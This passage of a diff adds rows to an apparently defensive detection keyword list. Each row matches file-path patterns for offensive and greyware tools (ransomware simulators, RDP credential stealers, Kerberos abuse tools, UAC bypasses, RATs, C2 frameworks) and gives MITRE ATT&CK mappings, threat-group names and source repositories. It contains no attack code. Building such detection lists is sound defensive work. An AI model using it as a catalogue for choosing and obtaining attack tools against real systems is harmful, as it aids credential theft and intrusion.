+"*\PSRansom -*","offensive_tool_keyword","PSRansom","PSRansom is a PowerShell Ransomware Simulator with C2 Server capabilities. This tool helps you simulate encryption process of a generic ransomware in any system on any system with PowerShell installed on it. Thanks to the integrated C2 server. you can exfiltrate files and receive client information via HTTP.","T1486 - T1107 - T1566.001","TA0011 - TA0010","N/A","N/A","Ransomware","https://github.com/JoelGMSec/PSRansom","1","0","N/A","N/A","4","371","95","2022-09-29T09:54:34Z","2022-02-27T11:52:03Z"
+"*\Public\dcapi.dll*","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","N/A","10","4","361","96","2023-08-13T11:20:25Z","2019-04-20T14:51:18Z"
+"*\public\klogging.log*","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/g3tsyst3m/undertheradar","1","0","N/A","9","1","7","0","2023-08-10T00:30:20Z","2023-07-01T17:59:20Z"
+"*\Public\Music\RDPCreds.txt*","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","0","N/A","10","2","196","34","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z"
+"*\pwn.exe*","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*\py2exe*","greyware_tool_keyword","py2exe","py2exe allows you to convert Python scripts into standalone executable files for Windows othen used by attacker","T1564.004 - T1027.001 - T1059.006","TA0002 - TA0003 - TA0005","Operation Wocao","N/A","Execution","https://github.com/py2exe/py2exe","1","0","greyware_tools high risks of false positives","N/A","7","646","83","2023-09-25T23:45:56Z","2019-03-11T13:16:35Z"
+"*\pywsus.py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*\Quasar.v*.zip*","offensive_tool_keyword","QuasarRAT","Free. Open-Source Remote Administration Tool for Windows. 
Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.","T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060","TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/quasar/Quasar","1","0","N/A","N/A","10","7283","2269","2023-09-06T10:53:31Z","2014-07-08T12:27:59Z"
+"*\Quasar-master*","offensive_tool_keyword","QuasarRAT","Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.","T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060","TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/quasar/Quasar","1","0","N/A","N/A","10","7283","2269","2023-09-06T10:53:31Z","2014-07-08T12:27:59Z"
+"*\Ransomware.exe","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","0","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z"
+"*\rarce.py*","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","0","N/A","9","2","108","18","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z"
+"*\rasman.exe*","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","0","N/A","10","4","353","54","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z"
+"*\RasmanPotato*","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","0","N/A","10","4","353","54","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z"
+"*\ratchatPT.go*","offensive_tool_keyword","ratchatpt","C2 using openAI API","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","0","risk of False positive","10","10","4","2","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z"
+"*\ratchatPT.syso*","offensive_tool_keyword","ratchatpt","C2 using openAI API","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","0","risk of False positive","10","10","4","2","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z"
+"*\rcat-v*-win-x86_64.exe*","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","0","N/A","10","10","574","56","2023-10-02T11:32:12Z","2021-06-04T17:03:47Z"
+"*\rdcman.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*\rdp.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) 
is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*\RDPCredsStealerDLL*","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","0","N/A","10","2","196","34","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z"
+"*\RealTimeSync.exe*","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://freefilesync.org/download.php","1","0","N/A","9","10","N/A","N/A","N/A","N/A"
+"*\Reaper\Reaper.cpp*","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","N/A","10","1","62","19","2023-09-22T22:08:12Z","2023-09-21T02:09:48Z"
+"*\Reaper-main\*.sys*","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. 
This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","N/A","10","1","62","19","2023-09-22T22:08:12Z","2023-09-21T02:09:48Z"
+"*\REC2-main.zip*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z"
+"*\Recon.tests.ps1*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z"
+"*\RecycledGate.c*","offensive_tool_keyword","RecycledInjector","Native Syscalls Shellcode Injector","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/florylsk/RecycledInjector","1","0","N/A","N/A","3","214","35","2023-07-02T11:04:28Z","2023-06-23T16:14:56Z"
+"*\RedPersist.exe*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z"
+"*\RedPersist.pdb*","offensive_tool_keyword","RedPersist","RedPersist is a Windows 
Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z"
+"*\RedPersist.sln*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z"
+"*\RedPersist-main\*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z"
+"*\reg-query.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*\RemoteCamera.dll*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","0","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z"
+"*\Resources\Disks-NoEncryption.txt*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","0","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z"
+"*\resources\PROCEXP.sys*","offensive_tool_keyword","Backstab","A tool to kill antimalware protected processes","T1107 - 
T1106 - T1543.004 ","TA0002 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/Yaxser/Backstab","1","0","N/A","N/A","10","1237","216","2021-06-19T20:01:52Z","2021-06-15T16:02:11Z"
+"*\ROADtools\*","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dirkjanm/ROADtools","1","0","N/A","N/A","10","1355","206","2023-10-04T08:58:38Z","2020-03-28T09:56:08Z"
+"*\rpcrt.py","offensive_tool_keyword","POC","Remote Code Execution Exploit in the RPC Library CVE-2022-26809","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/yuanLink/CVE-2022-26809","1","1","N/A","N/A","1","62","26","2022-05-25T00:57:52Z","2022-05-01T13:19:10Z"
+"*\rpt_win.exe","offensive_tool_keyword","ratchatgpt","ratchatpt a tool using openai api as a C2","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","0","N/A","10","10","4","2","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z"
+"*\rsocx.exe*","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/b23r0/rsocx","1","0","N/A","10","10","319","146","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z"
+"*\Rubeus.*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z"
+"*\Rubeus\*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z"
+"*\ruler.exe*","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1102.001 - T1201.001 - T1570.002","TA0006","N/A","N/A","Exploitation tools","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","1994","353","2021-02-19T09:28:07Z","2016-08-18T15:05:13Z"
+"*\run\john *","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*\run\john\*.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*\run\john\*.com*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - 
T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*\run\john\*.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*\run\john\*.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*\RunasCs.cs*","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs/","1","0","N/A","6","8","722","107","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z"
+"*\runasppl.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*\RunBOF.exe*","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - 
T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","0","N/A","10","10","129","22","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z"
+"*\RunOF.exe*","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","0","N/A","10","10","129","22","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z"
+"*\RunOF\bin\*","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","0","N/A","10","10","129","22","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z"
+"*\rusthound.exe*","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","AD Enumeration","https://github.com/OPENCYBER-FR/RustHound","1","0","N/A","9","7","676","56","2023-08-31T08:35:38Z","2022-10-12T05:54:35Z"
+"*\SafetyKatz*","offensive_tool_keyword","SafetyKatz","SafetyKatz is a combination of slightly modified version of @gentilkiwis Mimikatz project and @subtees .NET PE Loader. First. the MiniDumpWriteDump Win32 API call is used to create a minidump of LSASS to C:\Windows\Temp\debug.bin. Then @subtees PELoader is used to load a customized version of Mimikatz that runs sekurlsa::logonpasswords and sekurlsa::ekeys on the minidump file. 
removing the file after execution is complete","T1003 - T1055 - T1059 - T1574","TA0002 - TA0003 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/SafetyKatz","1","0","N/A","10","10","1101","244","2019-10-01T16:47:21Z","2018-07-24T17:44:15Z"
+"*\samantha.txt","offensive_tool_keyword","cobaltstrike","Dumping SAM / SECURITY / SYSTEM registry hives with a Beacon Object File","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/BOF-RegSave","1","1","N/A","10","10","171","29","2020-10-08T17:29:02Z","2020-10-07T13:46:03Z"
+"*\save_reg.hive*","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. 
RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion - Persistence","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","0","N/A","10","1","47","15","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z"
+"*\scanACLsResults.csv*","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","AD Enumeration","https://github.com/cyberark/ACLight","1","0","N/A","7","8","730","150","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z"
+"*\scan-network.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*\scmuacbypass.cpp*","offensive_tool_keyword","SCMUACBypass","SCM UAC Bypass","T1548.002 - T1088","TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/SCMUACBypass","1","0","N/A","8","1","57","9","2023-09-05T17:24:49Z","2023-09-04T13:11:17Z"
+"*\scmuacbypass.exe*","offensive_tool_keyword","SCMUACBypass","SCM UAC Bypass","T1548.002 - T1088","TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/SCMUACBypass","1","0","N/A","8","1","57","9","2023-09-05T17:24:49Z","2023-09-04T13:11:17Z"
+"*\SCMUACBypass\*","offensive_tool_keyword","SCMUACBypass","SCM UAC Bypass","T1548.002 - T1088","TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/SCMUACBypass","1","0","N/A","8","1","57","9","2023-09-05T17:24:49Z","2023-09-04T13:11:17Z"
+"*\ScreenConnect.Client.exe*","greyware_tool_keyword","ScreenConnect","control remote servers - 
abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","N/A","RMM","screenconnect.com","1","0","N/A","10","10","N/A","N/A","N/A","N/A"
+"*\ScreenConnect.ClientService.exe*","greyware_tool_keyword","ScreenConnect","control remote servers - abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","N/A","RMM","https://thedfirreport.com/2023/09/25/from-screenconnect-to-hive-ransomware-in-61-hours/","1","0","N/A","10","10","N/A","N/A","N/A","N/A"
+"*\ScreenConnect.ClientSetup.exe*","greyware_tool_keyword","ScreenConnect","control remote servers - abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","N/A","RMM","https://thedfirreport.com/2023/09/25/from-screenconnect-to-hive-ransomware-in-61-hours/","1","0","N/A","10","10","N/A","N/A","N/A","N/A"
+"*\ScreenConnect.WindowsBackstageShell.exe*","greyware_tool_keyword","ScreenConnect","control remote servers - abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","N/A","RMM","https://thedfirreport.com/2023/09/25/from-screenconnect-to-hive-ransomware-in-61-hours/","1","0","N/A","10","10","N/A","N/A","N/A","N/A"
+"*\ScreenConnect.WindowsClient.exe*","greyware_tool_keyword","ScreenConnect","control remote servers - abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","N/A","RMM","https://thedfirreport.com/2023/09/25/from-screenconnect-to-hive-ransomware-in-61-hours/","1","0","N/A","10","10","N/A","N/A","N/A","N/A"
+"*\ScriptSentry.ps1*","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential 
Access","https://github.com/techspence/ScriptSentry","1","0","N/A","7","1","44","3","2023-08-16T19:32:24Z","2023-07-22T03:17:58Z"
+"*\ScriptSentry.psd1*","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","0","N/A","7","1","44","3","2023-08-16T19:32:24Z","2023-07-22T03:17:58Z"
